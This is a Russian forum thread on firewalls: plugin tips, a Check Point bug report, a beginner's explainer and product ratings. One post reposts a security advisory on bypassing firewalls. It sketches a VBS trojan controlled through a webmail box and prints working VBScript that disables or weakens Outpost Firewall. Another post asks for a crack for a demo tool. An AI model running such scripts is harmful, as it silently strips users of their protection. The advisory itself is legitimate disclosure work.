Обсуждение брандмауэров и фаерволов

Doctor Grif

Ословед
Shell написал(а):
Есть в нем пароль! Так что уязвимость отсутствует.
Согласен с тобой, но лишь отчасти
все из этих програм (точнее почти все) предоставляют данную опцию, вся проблема в том что не многие пользователи вводят пароль для доступа к изменению настроек фаерволов.
Это так называемый "человеческий фактор" уязвимости приложений
 

Chartbreaker

Ословед
Johnny написал(а):
У меня эта версия (качал по твоей ссылке) и обновлял через инет, проблема присутствует!
Отправил сообщение в Агнитум с описание проблемы и скрином (спасибо Johnny).
 

Doctor Grif

Ословед
модули к Оутпост

Еще пара модулей:
whoeasy.exe - 331.00 Kb [216-223]
модуль позволяет по IP узнать о пользователе максимум возможной информации 30 бесплатных дней
sstealth_2003_07_24.exe - 173.63 Kb [216-223]
и второй :megalol: у меня не запустился (версия модуля 2003 год так что может устарел, скорее всего это тот стелс-режим который теперь доступен из настроек)
 
Flyer написал(а):
Отправил сообщение в Агнитум с описание проблемы, ответили что неужен скриншот проблемы, так что у кого возникнет - выложите скрин, отправлю и тогда, вероятно, эту проблему устранят.
Сделал скрин, только не знаю такой покатит? И куда его кинуть, сюда не получается...
 

    Chartbreaker

    очки: 1
    Нет комментариев

Doctor Grif

Ословед

Doctor Grif

Ословед
CheckPoint FireWall-1 NG Feature Pack 3

В CheckPoint FireWall-1 NG Feature Pack 3 есть достаточно неприятный баг, который проявляется при передачи файлов свыше 2-х мегабайт посредством OPSEC CVP технологии. Выяснения причин дали очень оригинальные результаты. На мой взгляд межсетевой экран CheckPoint FireWall-1 лучший в своем роде. Специалист может из него выжать многое - от простой блокировки портов до блокирования рекламы с WWW серверов и почты. Перечисление основных вариантов займет целую страницу текста. FireWall-1 предоставляет возможность создавать целую систему безопасности на межсетевом уровне. Можно к нему подключать системы обнаружения атак, системы антивирусного контроля, системы контроля доступа и все это благодаря их же открытому протоколу OPSEC (Open Platform for Secure Enterprise Connectivity). Очень полезная и удобная штука в умелых руках. Однако техническая поддержка в CheckPoint ни чем не отличается от их FAQ. Т.е. можно считать, что поддержки просто нет. На сложный технический вопрос будет ответ «Вы пробовали включать компьютер в розетку?». Мы, конечно, утрируем, но параллели именно такие. Вот и сейчас попытка решить проблему сродна попытке пробить головой бетонную стену, причем таких ситуаций было много. Только вот известно, что «русские не сдаются», но об этом позже.

С момента выхода апдейта для CheckPoint FireWall-1 NG, который носит гордое имя Feature Pack 3 (что-то вроде Servive Pack) перестали проходить толстые файлы через FireWall, если использовать антивирусную проверку. HTTP, SMTP, FTP данные проходят, но если они не более 2-х мегабайт. Обращение в поддержку CheckPoint ничего не дало, кроме головной боли по составлению описаний проблемы под разным ракурсом. Ответ один: «а у нас все работает». Стали грешить на свой антивирус и пробовать подключать другие антивирусы. И чудо! Один антивирус, причем из той же страны производителя FireWall, под названием eSafe Gateway, работает «на ура!». Все проходит, все проверяется. Жаль, что диагностика событий у него слабая, но с этим жить можно. Можно, но временно Стали копать глубже. Начали смотреть трафик между FireWall и eSafe. Тут нас хватил удар, причем волосы дыбом встали, когда поняли что именно делает eSafe. eSafe Gateway проверяет примерно первые 15 килобайт полученных данных с FireWall и на основе только этих данных дает диагностику! Мы сначала не поверили своим глазам. Стали проверять, посылая вирус по почте. Если вирус в начале письма, то он определяется. Если он находится дальше этих 15-и килобайт, то eSafe его не видит! Тут посетила гениальная мысль посмотреть настройки eSafe. Посмотрели. Не нашоли ничего, где можно установить объем проверяемых данных. Ok. Пусть eSafe не антивирус, а всего лишь подделка под него. Выход решили искать путем создания собственного а-ля антивируса. Нашли библиотеки и документацию OPSEC. К нашей радости архив OpsecSdkNgFp3.WIN32.tar.gz содержит в себе пример именно того, что мы хотели создать. cvp_av_server.c это пример простого OPSEC CVP Serverа (CVP – Content Vectoring Protocol), в котором есть все, кроме самой проверки на вирус. Откомпилировали, запустили и наткнулись на те же грабли. Файл в 2.7 мегабайта, отправленный по почте, через FireWall не прошел. Само собой отправил эту информацию в поддержку. И само собой поддержка уже слышать об этом не хочет. Отворот-поворот мы получили, но в очень вежливой форме! Типа «мы проверили, но Ваша проблема у нас не наблюдается». А вот чем там проверяли? Тем же eSafe, что ли? Нажать кнопку и дурак сможет, а вот подумать Совершенно не понятно, почему нельзя использовать собственный пример (cvp_av_server.c) для проверки собственного FireWall?.. Со временем выяснили, что патчи там быстро делают только для крупных клиентов. С мелочью, типа нас, не возятся.

Технически баг выглядит следующим образом.
1. FireWall принимает SMTP данные, кладет это в файл директории spool и переправляет их на CVP Server для проверки, но порциями.
2. Передача временно останавливается через один или через два мегабайта (мы заметили только эти два ограничения).
3. Ровно(!) через 5 минут передача на CVP Server продолжается (количество этих порций может быть несколько).
4. После того, как CVP Server принял данные и сказал об этом FireWall, этот FireWall тут же перекладывает файл из spool в spool\d_resend (в директорию для посылки позже). В журнале (SmartView Tracker) эта операция никак не отражена.
По прошествии времени, указанного в настройках FireWall этот файл пытается отправить по вышеописанной схеме. Т.е. до тех пор, пока файл не будет уничтожен, как слишком старый. Можно наблюдать эту проблему в файле MDQ.LOG, если включить отладку с командной строки «fw debug mdq on MDQ_DEBUG_LEVEL 3».

Приведем кусок лога MDQ.ELG по пункту 4:
[skip]
[mdq 1008]@firewall fwav_send: session 12bd440 buf=012199D8, len=1247
[mdq 1008]@firewall fwav_send: session 12bd440 buf=0012EC90, len=5
[mdq 1008]@firewall fwav_send: session 12bd440 buf=00000000, len=0
// Все, конец данных, передаваемых на CVP Server
// CVP Server принял последние данные, о чем и сообщил FW.
// FW, почему-то, тут же положил эти данные в D_resend.
fwav_sdk_dummy_handler: connection is active
[mdq 1008]@firewall INFO is NOT handled in new_av_client:get_reply
// Кто бы объяснил, что тут есть INFO is NOT handled
[mdq 1008]@firewall fwav_accept_data: session 12bd440
[mdq 1008]@firewall fwasync_connbuf_realloc: reallocating 1203150 from
1036 to 5
[mdq 1008]@firewall fwasync_connbuf_realloc: reallocating 11ab7d0 from
1053 to 5
[mdq 1008]@firewall fwasync_mux_out: 920: write: Connection Reset by
peer
[mdq 1008]@firewall fwav_drop: session 12bd440
[mdq 1008]@firewall remove session from uid table!
[mdq 1008]@firewall session opaque NULL
[mdq 1008]@firewall fwasync_mux_in: 1044: read: Connection Reset by
peer
[mdq 1008]@firewall mdq_scan: scanning the mdq dir
[mdq 1008]@firewall mdq_scan: scanning the mdq dir
[mdq 1008]@firewall mdq_scan: scanning the mdq dir
[skip]
То ли это баг, то ли FireWall ждет какую-то команду/сигнал от CVP Serverа, которую забыли описать в примере, - выяснить не удалось.
Выражаю благодарность группе BugTraq за предоставление инфы.
Так, что шлите господа вирусы, шлите! Только они должны быть не первыми, а килобайт эдак через 20 от начала письма. Может нас это минует, но если на нее попадется какой-нибудь «крупняк» для CheckPoint и проблему быстренько решат
ПыСы: Меня заинтересовал данный фаер, может у кого есть данный продукт? выложите PLZ
 

Doctor Grif

Ословед
Kotbars написал(а):
Для тех, кто едет далеко позади бронепоезда - читай посты внимательно!
насколько я понял, по посту, который ты написал, тебе кажется, при грамотной настройке осла фаер не нужет, но фаер предназначен не для работы осла, а для защиты твоего компа от попыток пробиться на него, а ман по настройке фаера для Осла я писал для того, чтоб их подружить, ибо по умолчанию фаер не дает ослу выходить из Локалхоста в сеть и соответственно принимать ослик тоже не может, если я не прав, то аргументируй,но в дальнейшем флуда не надо, проще в ПС написать
 

Hitokiri

Самец :)
gan написал(а):
вот стоко написано про фаер! а кому мы нужны чтоб нас хакать ! надо спросить кого хакали сначала и вообще нужен он вообще нам!
Для тебя фаер нужен в основном не для того что бы тебя не взломали какие-нибудь хакеры. Действительно кому ты нужен? А что бы потом не ныть "откуда у меня набежало ххх мБ за инет ?", "Почему у меня столько вирусов", "Почему у меня машина тормозит? все срочно на помощь!"
gan написал(а):
че ваш фаер один может сделать ! в сети сидят одни админы которые мечтают как включить фаер) а потом думать а что с ним делать)
Правильно настороеный фаервол решает бОльшую часть проблем связаную с сетевой безопасностью. А ламеров которые не ставят обновления оси и фаервол и перегружают сеть паразитным траффиком нужно вообще от сети отключать.
 

Doctor Grif

Ословед
gan написал(а):
вот стоко написано про фаер! а кому мы нужны чтоб нас хакать ! надо спросить кого хакали сначала и вообще нужен он вообще нам! он ведь для компаний предназначен где есть коммерческая информация и за фаер они платять деньги иза обновы и сидят там администраторы сетевые которые мешают хакеру взломав защиту фаера продолжать лазить по компьютеру! че ваш фаер один может сделать ! в сети сидят одни админы которые мечтают как включить фаер) а потом думать а что с ним делать)
p.s. Doctor Grif - неидет тебе прическа.
Ответы по пунктам:
я не знаю на сколько надо меня хакать, но довольно часто наблюдаю картину, когда идет широкополосный скан моего IP и не только, не буду перечислять IP, с которых это производилось, я так думаю, в сети сидят начинающие "кул хацкеры" и пробуют силы :newconfus ;
после установки и настройки фаера трафик у меня снизился примерно % на 10-12 (экономика должна быть экономна);
для админов-RTFM еще никто не отменял, да и форумов соответствующих полно-задайте вопрос и вам с радостью ответят
Маленькое отступление: сам себя для пробы ломал с другого компа, полный контроль не получил, так как фаер просто в глухую перекрыл трафик (есть конечно варианты как это обходить...но не время и не место это объяснять)
По поводу прически-это я еще заросший :megalol:
 

Doctor Grif

Ословед
ГОСУДАРСТВЕННЫЙ РЕЕСТР сертифицированных средств защиты информации

Вот чем пользуются "Отцы" для защиты сетей. Краткий перечень
Система сертификации средств защиты информации по требованиям безопасности информации № РОСС RU.0001.01БИ00 ГОСУДАРСТВЕННЫЙ РЕЕСТР сертифицированных средств защиты информации
 

Doctor Grif

Ословед
Статья в целях самообразования (ТОЛЬКО!)

Надыбал одну статейку, почитайте....
Тема: Обход средств защиты клиентских приложений
Категория: Обход защиты
Подверженные продукты: CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application Intelligence R55HFA09 Microsoft Windows XP SP2 Agnitum Outpost Pro 2.1.x Tiny Firewall Pro v6.0.100 ZoneAlarm Pro with Web Filtering v4.5.594 BlackICE PC Protection 3.6 Kerio Personal Firewall 4.0 WRQ ATGuard v3.2
Авторы: 3APA3A, <3APA3A@security.nnov.ru>, offtopic, <offtopic@mail.ru>
Авторы благодарят Игоря Митюрина за тестирование и координацию работ с уязвимостями CheckPoint. Также авторы выражают благодарности компании Checkpoint за сотрудничество, компании Agnitum за дебаты по вопросам "Опоссума" и некоторые идеи.
Отказ от обязательств
</САРКАЗМ>
Эта статья не является попыткой научить скрипт-кидди писать троянские программы, и уж тем более не попытка создать подобную программу авторами. Это предложение сообществу специалистов в области безопасности начать осуждение механизмов защиты клиентских приложений. Авторы проносят свои извинения тем производителям, продукты которых содержат описанные в статье уязвимости. Авторы уверенны, что решать надо не конкретные проблемы, но менять отношение к защите клиентских приложений, что требует архитектурных модификаций средств защиты. Если ситуация не изменится, любой школьник, умеющий писать программы на Бейсике сможет получить доступ в защищенную сеть. Авторы разделяют точку зрения, что описанные проблемы не являются уязвимостями продуктов.
<САРКАЗМ> Так, Pedram? <АПЛОДИСМЕНТЫ />
1. Введение
1.1 Зачем защищать клиентов? В последние годы мы наблюдаем революцию в области безопасности сетевой инфраструктуры. К более безопасным и стабильным сетевым службам и операционным система добавились такие решения как межсетевые экраны, работающие на седьмом уровни модели OSI, системы обнаружения и предотвращения атак, отказоустойчивые кластеры и распределенные системы борьбы с DDoS атаками... Но в области защиты клиентских приложений практически ничего не изменилось. Безопасность браузеров, почтовых клиентов, программ мгновенного обмена сообщениями, по сути, находится на том же уровне, что и 5 лет назад. Более того, ситуация ухудшилась, поскольку бизнес стал более зависим от этих приложений. Попробуйте предложить своему боссу отказаться от использования электронной почты.
<АПЛОДИСМЕНТЫ />
Почему мы должны заботиться о безопасности клиентских приложений? Поскольку они представляют собой точку периметра. Браузер может одновременно использоваться и для загрузки свежих программ с www.astalavista.com и для работы с банковским приложением.
<ВОЗРАЖЕНИЯ ИЗ ЗАЛА, ПРОИГНОРИРОВАНЫ />
Мы, в числе других специалистов в области безопасности считаем, что индустрия движется в неправильном направлении. В данной статье мы попытаемся показать, как получить доступ в защищенную по современным меркам корпоративную сеть без использования специальных средств и знаний. Что бы не утомлять читателей ассемблерным кодом, все примеры были созданы с использованием Notepad.exe и не нуждаются в компиляции и специальных знаниях для понимания.
1.2 Какие средства защиты клиентов используются в ваш сети? Существует не так уж много средств защиты корпоративных клиентов. К ним принадлежат межсетевые экраны с функцией фильтрации содержимого (мы относим в эту же категорию антивирусные системы) и различные "персональные" межсетевые экраны и антивирусы. Многие персональные средства защиты контролируют целостность настроек, и прикладных задач, ограничивают сетевое взаимодействие неизвестных приложений, а так же блокируют потенциально небезопасные вызовы API. Существуют и другие методы защиты клиентов, некоторые из которых обсуждаются далее, но к сожалению, они либо находятся в зачаточном состоянии либо используются крайне редко.
1.3 Я не использую перечисленные продукты! Мне стоит читать дальше? Мы не собираемся учить вас тому, как взламывать конкретную программы. Последние события, связанные с оплатой уязвимостей в браузере Mozilla показывают, что за $500 можно найти уязвимость в любом приложении. Про Internet Explorer мы не будем даже упоминать - спрос гораздо выше. Соответственно - 500 долларов, это всё, что необходимо для проникновения в вашу сеть. И эти деньги не понадобятся для обхода персональных межсетевых экранов и фильтров содержимого. Они обходятся любым школьником бесплатно. Если это все что у вас есть, значит, у вас нет никакой защиты. В действительности, компании типа iDefense делают для защиты вашей компании больше чем многие производители средств защиты. Они скупают уязвимости до того, как они попадут на теневой рынок.
<СМЕХ, ВОЗРАЖЕНИЯ (ПРОИГНОРИРОВАНЫ), АПЛОДИСМЕНТЫ /> </САРКАЗМ>
Проблема оплаты поиска уязвимостей не так проста, как кажется многим. Здесь уместна аналогия с рынком программного обеспечения. Без коммерческого программного обеспечения freeware не выживет, поскольку любому человеку нужны деньги.
<САРКАЗМ> Full-disclosure? Who believe in it..
И так, демонстрации:
- Обход фильтров содержимого на персональных и корпоративных межсетевых экранах (да, снова и снова - обход фильтров содержимого).
- Обход защиты сетевого взаимодействия на персональных межсетевых экранах.
- Обход контроля целостности на персональных межсетевых экранах.
Выше приведен список уязвимых продуктов. Он далеко не полон. Мы связались с некоторыми производителями и от некоторых получили ответы. Были выпущены обновления, но ни один из производителей не сумел закрыть все описанные уязвимости.
<ТРЕВОЖНАЯ ТИШИНА В ЗАЛЕ /> <ВСЕ ДОСТАЮТ ИЗ СУМОК ЧЕРНЫЕ ШЛЯПЫ И НАДЕВАЮТ ИХ />
2. Снова и снова - обход фильтров содержимого ____________________________________________________________
Аксиома: всегда можно найти ещё один способ обхода фильтров содержимого.
Описание: поскольку фильтры содержимого и клиентское приложение используют различные алгоритмы обработки данных, данные будут по-разному обрабатываться клиентским приложением и фильтром содержимого.
2.1 Тестовая конфигурация В процессе тестирования мы проверяли модули фильтрации содержимого двух межсетевых экранов: Checkpoint представлял семейство корпоративных продуктов, Agnitum Outpost Pro выступал представителем персональных экранов. Оба продукта были настроены на фильтрацию сценариев VBScript и JavaScript и элементов ActiveX. Используя различные техники [1] были созданы WEB-страницы, обрабатываемые браузером Internet Explorer как сценарии, обходя защиту межсетевых экранов (не говоря об антивирусах, всё же это не их дело).
2.2 Описание тестов:
2.2.1 http://www.security.nnov.ru/files/opossum/test1.html Проблемы с обработкой специальных символов (0x0B). [1].II.9
2.2.2 http://www.security.nnov.ru/files/opossum/test2.html Проблемы с обработкой кодировки RFC2781 (UTF-16, little endian). [1].II.1
2.2.3 http://www.security.nnov.ru/files/opossum/test3.html Проблемы с обработкой кодировки RFC2781 (UTF-16, big endian). [1].II.1
2.2.4 http://www.security.nnov.ru/files/opossum/test4.gif Различные методы обработки типа содержимого [1].II.13
2.2.5 http://www.security.nnov.ru/files/opossum/test5.gif Расширение 2.2.4 за счет использования проблем буферизации потока.
2.2.6 http://www.security.nnov.ru/files/opossum/test6.html Проблемы с обработкой специальных символов (0x00). [1].II.9
2.2.7 http://www.security.nnov.ru/files/opossum/test7.asp Проблемы с обработкой кодировки UTF-7 (Content-Type) [1].II.2
2.2.8 http://www.security.nnov.ru/files/opossum/test8.html Проблемы с обработкой кодировки (Meta http-equiv) [1].II.2
2.2.9 http://www.security.nnov.ru/files/opossum/test9.html Отсутствие проверки сценариев в выражениях expression(). Описано http-equiv (malware.com).
2.2.10. http://www.security.nnov.ru/files/opossum/test10.html Отсутствие проверки сценариев в стилях [1].II.15
2.2.11 http://www.security.nnov.ru/files/opossum/test11.mht Отсутствие обработчика файлов MHTML (RFC2557)
Эти техники известны уже несколько лет. Outpost не прошел ни одного теста. Checkpoint провалил 2.2.2, 2.2.3, 2.2.6, 2.2.8, 2.2.9, 2.2.10, 2.2.11.
2.3 Ответы производителей: Мы связывались и с Checkpoint и с Agnitum. Checkpoint обещал закрыть тестируемые уязвимости в комплексном хотфиксе R55HFA10. В тестовом варианте хотфикса блокировались уязвимости с 2.2.1 по 2.2.10. Для устранения 2.2.11 Checkpoint предлагает заблокировать некоторые файлы (что не может считаться, на наш взгляд, адекватным решением). Релиза R55HFA10 еще не было и блокирование теста 2.2.11 под вопросом. Agnitum устранил 2.2.1 и 2.2.7 уязвимости в версии 2.5. Остальные проблемы не устранены и сроки устранения нам неизвестны. Перед тем как ссылаться на эти уязвимости, проверьте свой фильтр содержимого. 3. Обход ограничения сетевого доступа с использованием доверенного приложения
____________________________________________________________
Аксиома: Троян умеет все, что умеет клиентская программа
После того, как мы успешно выполнили атаку, нам необходимо получить контроль над взломанным компьютером.
Многие персональные межсетевые экраны ограничивают сетевой доступ, путем отслеживания, какие из приложений пытаются взаимодействовать с сетью. Часто контролируется и целостность разрешенных приложений, что бы вредоносное ПО не могло модифицировать их код. Это делает невозможной установку троянских программ для удаленного управления. Общая идея обхода подобных мер защиты, это использование доверенного клиентского приложения (например, браузера) для доступа к внешней сети. Обычно это реализуется путем контроля приложения с использованием техник внедрения DLL, WriteProcessMemory(), CreateRemoteThread() и т.д. и т.п. Описание этих техник можно найти в документах [2] и [3]. Использование этих техник зачастую требует высоких привилегий и достаточно хороших знаний операционных систем. Кроме того, современные межсетевые экраны часто блокируют потенциально небезопасные вызовы API. Ещё одной неприятностью заключается в том, что при реализации это подхода приходиться самостоятельно реализовывать все сетевое взаимодействие, ожидаемое от клиентской программы (например, HTTP для браузера) и задействовать механизмы определения сетевой топологии. Т.е. если в сети есть Proxy, необходимо уметь работать через него. Кроме того, доступ клиентского приложения к различным сетевым адресам может быть ограничен на межсетевом экране. Мы не любим сложных решений. Как все люди, мы ленивы, поэтому мы предлагаем вашему вниманию CAT (Client Application Trojaning). Мы контролируем клиентское приложение без модификации его кода. По ссылке http://www.security.nnov.ru/files/opossum/CAT.zip вы можете найти приложение, демонстрирующее данный подход. Программа использует COM для запуска и контроля клиентского приложения (Internet Explorer). Это позволяет получить практически полный доступ к ресурсам приложения и использовать его для работы с нашим сервером, используя контекст безопасности текущего пользователя, а так же сетевые настройки (Proxy-сервер и т.д.). В нашем приложении не нужно реализовывать клиента HTTP, это сделал за нас Microsoft. Для обхода разграничения доступа к серверам, мы используем работу через потенциально разрешенные серверы. В пример используется популярный сервер электронной почты - mail.ru. Есть масса других возможностей, такие как доски объявлений, серверы поиска работы (вы никогда не получали резюме от Трояна?), on-line переводчики http://translate.google.com/translate?hl=en&u=www.security.nnov.ru да и просто переводчики, сами поисковые системы... Правда в последнем случае итерация будет занимать несколько дней.
В нашем примере CAT PoC работает следующим образом:
- Он создает COM-объект Internet Explorer и направляет его на www.mail.ru.
- CAT указывает имя пользователя и пароль, после чего получает доступ к почтовому ящику на сервере.
- CAT отсылает уведомляющее сообщение "ready" указанному адресату.
- Каждые 20 секунд CAT проверяет папку "Входящие" на наличие сообщений с темой XXX.request (XXX - целое число).
- Если подобное сообщение при CAT читает его, удаляет и передает содержимое сообщения командному интерпретатору.
- Результаты обработки пересылаются в указанный почтовый ящик.
Удалите строку IE.Visible = true для запуска в скрытом режиме. Все эти замечательные возможности умещаются в 100 строк кода на VBS. Как видите, иногда Бейсик гораздо эффективнее ассемблера.
<РАЗВЕ С ЭТИМ НЕ СПРАВИТЬСЯ РЕБЕНОК? />
Червь ILOVEYOU и другие вирусы, написанные на языках сценариев, показали, что подобную программу может написать четырнадцатилетний школьник.
Учитывая тесную интеграцию Windows Scripting Hosts с системой и постоянно развивающиеся возможности WMI, можно ожидать всплеска подобных "решений". Все тестируемые персональные межсетевые экраны не смогли обнаружить CAT. Исключение составил Outpost 2.5, который предупредил о создании COM приложения. Однако через пять минут исследований и такого же количества строчек кода CAT научился работать через Outpost 2.5. Это мы оставляем в качестве домашнего задания.
Подсказка: Для успешной инициализации IE должен создаваться после запуска IE пользователем.
4. Обход защиты целостности
____________________________________________________________
Аксиома: Троян умеет все, что умеет пользователь
Сценарий выгрузки Outpost
set WShell = CreateObject("WScript.Shell")
WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"
Сценарий переключает Outpost в "мягкий" режим
set WShell = CreateObject("WScript.Shell")
WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 100
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 10
WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
WScript.Sleep 10
WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
WScript.Sleep 10
WShell.SendKeys "a{ENTER}"
WScript.Sleep 10
WShell.SendKeys "{F10}{LEFT}{DOWN}"
WScript.Sleep 10
WShell.SendKeys "n"
5. Заключение.
____________________________________________________________
Аксиома: В защите клиентов нет аксиом
Одно из наиболее приемлемых направлений в защите клиентских приложений, это реализация замкнутой среды выполнения, так называемой "песочницы". Существует ряд попыток реализовать подобные решения без ограничения функциональности, к примеру - GeSWall [4](в настоящее время этот проект ищет спонсора). Существует ряд коммерческих решений, но реализация большинства из них не обеспечивает должного уровня изоляции клиентских приложений. Даже виртуальные машины большинства производителей так же имеют каналы взаимодействия с базовой операционной системой, которыми могут воспользоваться злоумышленники. Еще одно неплохое решение - вынос потенциально опасных приложений в клиентскую ДМЗ с организацией доступа к ним через терминальные серверы [5]. Конечно же, это решение тоже не гарантирует 100% безопасности.
<БУРНЫЕ И ПРОДОЛЖИТЕЛЬНЫЕ АПЛОДИСМЕНТЫ, ВОЗРАЖЕНИЯ (ПРОИГНОРИРОВАНЫ), ТУХЛЫЕ ЯЙЦА ИЗ ЗАЛА (ПОДДЕРЖАНЫ ВЫСТУПАЮЩИМИ) />
6. Ссылки:
[1] 3APA3A, Bypassing content filtering software http://www.security.nnov.ru/advisories/content.asp
[2] Firewall leak tester http://www.firewallleaktester.com/
[3] rattle, Using Process Infection to Bypass Windows Software Firewalls http://www.phrack.org/show.php?p=62&a=13
[4] GeSWall (General Systems Wall) http://www.securesize.com/
[5] offtopic, 3APA3A, "In front of front-end security" http://www.linuxchile.cl/docs.php?op=ver&id=65
<WARNING: Тег САРКАЗМ не был открыт в документе \> <WARNING: Тег САРКАЗМ не был закрыт в документе \>
 

Doctor Grif

Ословед
Что такое FireWall?

Как работает сеть и что такое межсетевой экран (Fire Wall)
Ещё год назад 90% пользователей Интернета не имели понятия о том что такое межсетевой экран (firewall), и прекрасно без него обходились. Однако в результате эпидемий сетевых червей, на сегодняшний день работа в Интернет без межсетевого экрана стала практически невозможна. Компьютер без сетевого экрана подключенный к интернет, особенно через быструю линию (кабель, ADSL) заражается обычно в течении нескольких часов.
В связи с этим я хочу очень упрощённо объяснить что такое Fire Wall.

Но перед этим я хочу в самых общих чертах обяснить принцип работы сетей (Интернет – тоже сеть). Что бы было проще понять, я проведу аналогию между виртуальным «миром» сети и обычным миром.
Итак, компьютеры, объединённые в сеть, обмениваются информацией. Информация эта пересылается в виде пакетов. Представьте себе что каждый компьютер – это дом. Представьте себе, что пакеты – это маленькие человечки, которые бегают от дома к дому, передавая нужную информацию. В дальнейшем этих человечков так и будем называть – пакеты.
Как и у домов, у каждого компьютера в сети есть адрес. Адрес представляет собой строку, состоящую из 4 групп чисел от 0 до 255, разделённых точками. К примеру, 212.20.123.15 Что бы входить в дом и выходить из него, используются двери. У компьютера роль дверей играют порты. Т.е. каждый порт можно представить как дверь, через которую входят и выходят пакеты. У каждого порта есть номер. Номер может быть от 0 до 65535.
Итак, чем же занимается firewall? Firewall контролирует двери (порты) и перемещение пакетов через эти двери.
У каждой двери есть 3 состояния: открыта, закрыта и невидима. Стоит заметить, что, в отличие от настоящего мира, где виден весь дом, в виртуальном мире сети «видны» только «двери» «дома», т.е. порты компьютера, подключенного к сети.

Несколько слов о том, как происходит обмен информацией.
Вот Вы подключились к Интернету. В этот момент Ваш компьютер получил адрес. Этот адрес неизвестен никому, кроме Вашего провайдера. Для того что бы начать обмен информацией, Ваш компьютер должен послать запрос другому компьютеру (адрес которого должен быть известен), и сообщить ему свой адрес. Только после этого может начаться обмен информацией. К примеру, чтобы зайти на какую-то страницу в Интернете, вы набираете её адрес. Адрес этот не такой, как я описал вначале, и это сделано исключительно для удобства. Когда Вы закончите набирать адрес страницы, браузер переведёт его в сетевой адрес сервера, на котором находится эта страница, обратится по этому адресу, передаст адрес Вашего компьютера, и только тогда сервер сможет отправить Вам содержимое нужной страницы.
У firewall-а есть 2 основные цели. Защита от проникновения на компьютер снаружи (взлом) и защита от несанкционированной передачи данных с компьютера наружу (к примеру, предотвращение кражи паролей, номеров кредиток и т.д. троянскими программами).

Итак, что нужно для атаки на Ваш компьютер? Как минимум нужно знать его адрес. Конечно, для работы в Интернете Вы регулярно сообщаете свой адрес другим компьютерам. Однако, если Вы всегда обращаетесь только к надёжным ресурсам, хозяева которых не будут взламывать Ваш компьютер, то как желающий взломать его может узнать его адрес? Есть специальные программы, перебирающие сетевые адреса и проверяющие, есть ли по этому адресу компьютер. И тут в игру вступает firewall.
1. Защита от проникновения на компьютер снаружи
Операционная система (к примеру Windows) по умолчанию держит часть портов открытыми. Открытый порт компьютера так же опасен, как и открытая дверь дома. Любой желающий может зайти и напакостить. Через открытые порты так же распространяются сетевые черви типа Sasser. Понятно, что все двери желательно закрыть. В отличие от реальной жизни, в сети порты можно не только закрыть, но и сделать невидимыми. Компьютер, у которого все порты невидимы – невидим в сети, и это лучший из возможных вариантов. Если Вас никто не видит, то никто и не будет атаковать. Т.е. одна из задач firewall – обеспечение невидимости компьютера в сети.
Однако, даже если все порты невидимы, хакер может получить адрес Вашего компьютера. К примеру, когда Вы общаетесь с кем-то по ICQ, этот человек получает адрес Вашего компьютера. Если адрес вашего компьютера всё же стал известен хакеру, то за этим последует попытка его взломать. Если на Вашем компьютере есть открытые порты, то велика вероятность того, что попытка увенчается успехом. Еще одна задача firewall – держать порты закрытыми для предотвращения взлома, а также проникновения на компьютер сетевых червей.
2. Защита от утечки информации с компьютера.
В последнее время большое распространение получили троянские программы. При попадении такой программы на компьютер она может либо красть пароли и другую важную информацию, либо давать возможность управления компьютером удалённо. Человек, который посадил Вам троян, может видеть то что Вы видите на экране, знать, что Вы набираете на клавиатуре и т.д. Т.е. может делать на Вашем компьютере всё, что угодно. Правильно настроенный firewall разрешает работу с сетью только для некоторых, заведомо чистых программ (веб браузер, почтовый клиент...). Если на Вашем компьютере будет запущена неизвестная программа, в зависимости от настроек firewall может либо запретить ей доступ в сеть, либо выдать окошко с вопросом – разрешить ли этой программе работать с сетью. В этом случае важно не спешить отвечать «да», а попытаться понять, что это за программа. Так Вы можете обнаружить появление на компьютере троянских программ и предотвратить кражу информации и возможность управления Вашим компьютером.
Важно понимать!

Даже если у Вас на компьютере нет ничего важного, и Вам наплевать на то, что кто-то будет по нему лазить или сделает Вам format c:, Вам всё равно стоит поставить firewall. Ваш компьютер после взлома может быть использован для атак или взлома других компьютеров. Тем самым вы становитесь сообщником преступника. Подумайте, хочется ли Вам однажды обнаружить у себя дома сотрудников ЦРУ, потому что Ваш компьютер использовался для взлома компьютеров Пентагона

Статья опубликована с разрешения автора – Александра Степанова, (aka Geser), администратора сайта http://virusinfo.info/ Оригинал статьи находится на Securinfo:FireWall
 

Doctor Grif

Ословед
Утилита для настройки и управления встроенного в Windows XP SP2 (и Windows 2003 SP1)

FirePanel XP
размер: 169kb
статус: FreeWare
Утилита для настройки и управления встроенного в Windows XP SP2 (и Windows 2003 SP1) firewall'а. Для установки необходим .NET Framework 1.1.4322. Поддерживает мониторинг событий. Неплохое решение, для тех, кому хватает мощности стандартного файрвола.

firepanelxp.zip - 169.58 Kb [136-139]

Это демо версия, буду признателен тому, кто найдет лекарство...Doctor Grif
 

Doctor Grif

Ословед
Тест для проверки фаерволов

1. Быстрый тест - включает в себя проверку портов, троянские порты, проверка безопасности личной информации;
2. Stealth test (поскольку переводить лень, поэтому просто нагло сдеру с сайта возможности: TCP ping packet, TCP NULL packet, TCP FIN packet, TCP XMAS packet, UDP packet;
3. Browser test;
4. Trojans Test;
5. Advanced Port Scanner: TCP connect scanning (standard), TCP SYN scanning;
6. Exploits Test.

проходить по адресу: http://www.pcflank.com/test.htm
 

Doctor Grif

Ословед
Рейтинги средств защиты

Американский сайт TopTenREVIEWS в январе 2005 года составил по итогам 2004 года рейтинг лучших продуктов в сфере безопасности, так называемый 2005 Software Report. Все продукты тестировались по массе многочисленных параметров.


С файерволами все более или менее понятно. В течении всех последних лет, первое место надежно и уверенно держит ZoneAlarm Pro - это самый популярный файервол за рубежом. Outpost Firewall Pro за последние пару лет серьезно прибавил и занимает законное второе место. Много раз критиковавшийся ранее Norton Personal Firewall, в своей реинкарнации образца 2005 года наконец-то сумел приблизиться к вершине рейтинговой таблицы. На почетном 11 месте устроился файервол от лаборатории Касперского.
Personal Firewall Software Review 2005
1.ZoneAlarm Pro
2.Outpost Firewall Pro
3.Norton Personal Firewall 2005
